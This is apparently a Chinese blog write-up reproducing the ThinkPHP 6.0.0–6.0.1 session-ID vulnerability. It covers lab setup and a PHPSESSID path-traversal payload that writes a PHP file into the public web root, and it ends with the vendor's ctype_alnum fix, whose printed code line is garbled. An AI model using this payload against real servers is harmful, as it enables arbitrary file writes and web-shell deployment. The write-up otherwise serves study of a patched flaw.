ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

漏洞名称

漏洞描述

2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。

影响版本

ThinkPHP 6.0.0

ThinkPHP 6.0.1

漏洞复现

环境搭建

受害者IP:192.168.10.145

攻击者IP:127.0.0.1

安装thinkphp6

下载PHPstudy_pro,网上一堆自己找吧,链接不推了。

利用PHPStudy_pro对环境进行安装Composer2.5.8

创建网站,域名think6,会在think6目录下生成.htaccess文件和nginx.htaccess文件,将这两个文件移动到上个目录,也就是www目录下。

打开composer,composer2.5.8,php>=7.2


在www目录下面执行这个命令

bash 复制代码
cd ../
composer create-project topthink/think think6(think6自定义,这个会生成一个文件夹)  

将 think6/composer.json 文件的 "topthink/framework": "^6.0.0" 改成 6.0.0 版本,并执行更新命令

bash 复制代码
进入tp6目录
cd tp6
composer update

在本地访问网站为6.0.0,则成功搭建。

漏洞信息配置

构造位置:think6\app\controller\Index.php

需要增加构造的内容:

bash 复制代码
use think\facade\Session;
session::set('demo',$_GET['c']);

/think6/app/middleware.php 文件开启session,去掉注释session的//

漏洞利用

构造参数c和phpsessid;

bash 复制代码
index?c=<?php phpinfo();?>
PHPSESSID=../../../../public/1omg12377.php

访问public目录下的1omg12377.php文件。

修复建议

官方修复建议:对session id 加一个过滤,使用ctype_alnum()

bash 复制代码
$this->id = is_string($id) && strlen($id) === 32 ctype_alnum($id) && ? $id : md5(microtime(true) . session_create_id());
相关推荐
未完结的牵挂3 小时前
高质量代理池go_Proxy_Pool
网络安全
HackKong5 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
澜世5 小时前
2024小迪安全基础入门第三课
网络·笔记·安全·网络安全
vortex57 小时前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
.Ayang7 小时前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
星竹8 小时前
upload-labs-master第12关详细教程
网络安全
饮长安千年月8 小时前
浅谈就如何解出Reverse-迷宫题之老鼠走迷宫的一些思考
python·网络安全·逆向·ctf
东方隐侠安全团队-千里8 小时前
网安瞭望台第3期:俄黑客 TAG - 110组织与密码攻击手段分享
网络·chrome·web安全·网络安全
亚信安全官方账号10 小时前
亚信安全发布《2024年第三季度网络安全威胁报告》
网络安全